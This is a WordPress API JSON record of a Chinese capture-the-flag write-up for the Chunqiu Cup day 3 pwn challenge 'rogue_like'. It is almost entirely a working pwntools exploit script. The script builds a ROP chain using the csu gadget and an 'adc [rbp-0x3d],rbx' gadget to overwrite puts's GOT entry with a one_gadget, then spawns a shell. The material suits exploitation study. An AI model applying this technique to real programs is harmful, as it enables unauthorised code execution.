{"id":617,"date":"2025-01-26T12:59:51","date_gmt":"2025-01-26T04:59:51","guid":{"rendered":"http:\/\/39.104.51.85\/?p=617"},"modified":"2025-01-26T12:59:52","modified_gmt":"2025-01-26T04:59:52","slug":"%e6%98%a5%e7%a7%8b%e6%9d%afday3-pwn-rogue_like%e5%8d%8a%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e6%b3%95","status":"publish","type":"post","link":"http:\/\/39.104.51.85\/index.php\/2025\/01\/26\/%e6%98%a5%e7%a7%8b%e6%9d%afday3-pwn-rogue_like%e5%8d%8a%e9%9d%9e%e9%a2%84%e6%9c%9f%e8%a7%a3%e6%b3%95\/","title":{"rendered":"\u6625\u79cb\u676fday3 pwn rogue_like\u534a\u975e\u9884\u671f\u89e3\u6cd5"},"content":{"rendered":"\n

\u524d\u9762\u7684\u601d\u8def\u548c\u5b98\u65b9wp\u4e00\u6837\uff0c\u540e\u9762\u6211\u5229\u7528\u4e86\u4e00\u4e2amagic gadget\uff0c\u7701\u53bb\u4e86\u6808\u8fc1\u79fb\u7684\u7e41\u7410<\/p>\n\n\n\n

from pwnplus import *\ncontext.arch = 'amd64'\ncontext.log_level = 'debug'\np=mypwn('.\/pwn')\nelf=ELF('.\/pwn')\nlibc=ELF('.\/libc-2.27.so')\ndef choose(num):\n    p.sla(b'> ',str(num))\noffset1=0x002528\nchoose(1)\np.sla(b'!?\\n',str(offset1))\nchoose(2)\nchoose(5)\nchoose(0x602058)\nchoose(3)\nopcode=0x00000000004009d8\nonegadget=[0x4f29e,0x4f2a5,0x4f302,0x10a2fc]\noffset=onegadget[0]-libc.symbols['puts']\nif offset<0:\n    offset=2 ** 64 + offset\npayload=b'a'*0xa8+p64(0x00000000040145A)+p64(offset)+p64(elf.got['puts']+0x3d)+p64(0)*4+p64(opcode)+p64(elf.plt['puts'])+p64(0)*2\n# p.debug()\np.sd(payload)\np.sd('exec 1>& 0')\n\np.ia()\n\n'''\n\u8fd9\u6bb5\u811a\u672c\u6709\u6982\u7387\u6253\u901a\uff0c\u4e0d\u7a33\u5b9a\uff0c\u6253\u901a\u540e\u4ecd\u7136\u4f1a\u663e\u793aEOF\uff0c\u56e0\u4e3aclose(2)\u4e86\n\u6267\u884cexec 1>& 0\u7406\u8bba\u4e0a\u5c31\u80fd\u56de\u663e\u4e86\uff0c\u4f46\u6211\u672c\u5730\u4e0d\u56de\u663e\uff0c\u4f30\u8ba1\u662f\u73af\u5883\u7684\u95ee\u9898\n'''<\/code><\/pre>\n\n\n\n
magic_gadget\u662fadc [rbp-0x3d],rbx<\/p>\n\n\n\n
\u5229\u7528csu\u63a7\u5236rbx\u548crbp\u5373\u53ef\u8c03\u7528\u8fd9\u6bb5gadget\uff0c\u76f4\u63a5\u628aputs\u6539\u6210onegadget\u5c31\u53ef\u4ee5\u4e86\uff0c\u6700\u8fd1\u5199\u535a\u5ba2\u6709\u70b9\u7d2f\u4e86\uff0c\u611f\u5174\u8da3\u7684\u62ff\u7740exp\u81ea\u5df1\u7814\u7a76\u5427<\/p>\n","protected":false},"excerpt":{"rendered":"
\u524d\u9762\u7684\u601d\u8def\u548c\u5b98\u65b9wp\u4e00\u6837\uff0c\u540e\u9762\u6211\u5229\u7528\u4e86\u4e00\u4e2amagic gadget\uff0c\u7701\u53bb\u4e86\u6808\u8fc1\u79fb\u7684\u7e41\u7410 magic_gadge […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-617","post","type-post","status-publish","format-standard","hentry","category-pwn"],"_links":{"self":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/617","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/comments?post=617"}],"version-history":[{"count":1,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/617\/revisions"}],"predecessor-version":[{"id":618,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/617\/revisions\/618"}],"wp:attachment":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/media?parent=617"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/categories?post=617"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/tags?post=617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}